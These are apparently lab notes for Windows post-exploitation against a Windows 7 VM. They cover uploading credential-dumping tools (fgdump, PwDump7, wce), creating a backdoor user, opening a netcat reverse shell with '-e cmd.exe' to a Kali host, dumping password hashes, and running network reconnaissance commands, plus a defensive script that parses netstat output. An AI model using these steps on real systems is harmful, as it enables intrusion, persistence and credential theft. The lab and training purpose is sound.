Windows Post Exploitation

Target Server: IE8-Win 7 VM

1. Download fgdump, PwDump7, wce and netcat, then upload them into the IEUser folder on Windows 7.

2. Create the new user hackme with the password "password".

3. Locate fgdump and wce on Kali Linux. We can upload them to Win7 through FTP, wget, HTTP, etc.

4. Establish an nc connection between Kali Linux and Windows 7.

Kali Linux

nc -nvlp 

Windows 7

-nv 10.0.0.109  -e cmd.exe

We are connected now.

5. Execute pwdump7 through the Kali Linux session. Then copy the result and save it as the windows file on the Desktop.

pwdump7

Show the routing table and try to find something interesting.

route print

Show the ARP table (IP-to-physical-address mappings) and try to find something interesting.

arp -a

Show the active connections and try to find something interesting.

netstat -ano

Try to find as many more interesting things as possible.
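What "interesting" looks like in netstat -ano output, as an added example that is not part of the original notes: a small triage script that parses saved output and flags listeners bound to all interfaces and established sessions to non-loopback hosts, which is also how the nc session from step 4 shows up to a defender. The sample output is constructed; the ports, PIDs and the 10.0.0.110 local address are assumptions, and only 10.0.0.109 comes from the notes.

```python
import ipaddress
import re

# Constructed sample of `netstat -ano` output. Ports, PIDs and 10.0.0.110 are
# made up for the example; 10.0.0.109 is the Kali address used in step 4.
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:5357         0.0.0.0:0              LISTENING       4
  TCP    10.0.0.110:49170       10.0.0.109:4444        ESTABLISHED     2812
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:5355           *:*                                    1100
"""

# The State column is empty for UDP rows, so it is optional in the pattern.
ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z][A-Z_0-9]*)\s+)?(\d+)\s*$")

def split_endpoint(endpoint):
    # Split on the last colon so bracketed IPv6 works; drop brackets and zone id.
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]").split("%")[0], port

def parse_netstat(text):
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # banner, column header and blank lines
        proto, local, foreign, state, pid = m.groups()
        rows.append({"proto": proto, "local": split_endpoint(local),
                     "foreign": split_endpoint(foreign),
                     "state": state or "", "pid": int(pid)})
    return rows

def triage(rows):
    # Returns (kind, detail, pid) tuples; the PID maps to a process via tasklist.
    findings = []
    for r in rows:
        (lhost, lport), (fhost, fport) = r["local"], r["foreign"]
        if r["state"] == "LISTENING" and ipaddress.ip_address(lhost).is_unspecified:
            findings.append(("listener-all-interfaces", f"{r['proto']}/{lport}", r["pid"]))
        elif r["state"] == "ESTABLISHED" and not ipaddress.ip_address(fhost).is_loopback:
            findings.append(("established-remote", f"{fhost}:{fport}", r["pid"]))
    return findings

if __name__ == "__main__":
    print(*triage(parse_netstat(SAMPLE)), sep="\n")
```
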

Post Exploitation Guide:

https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
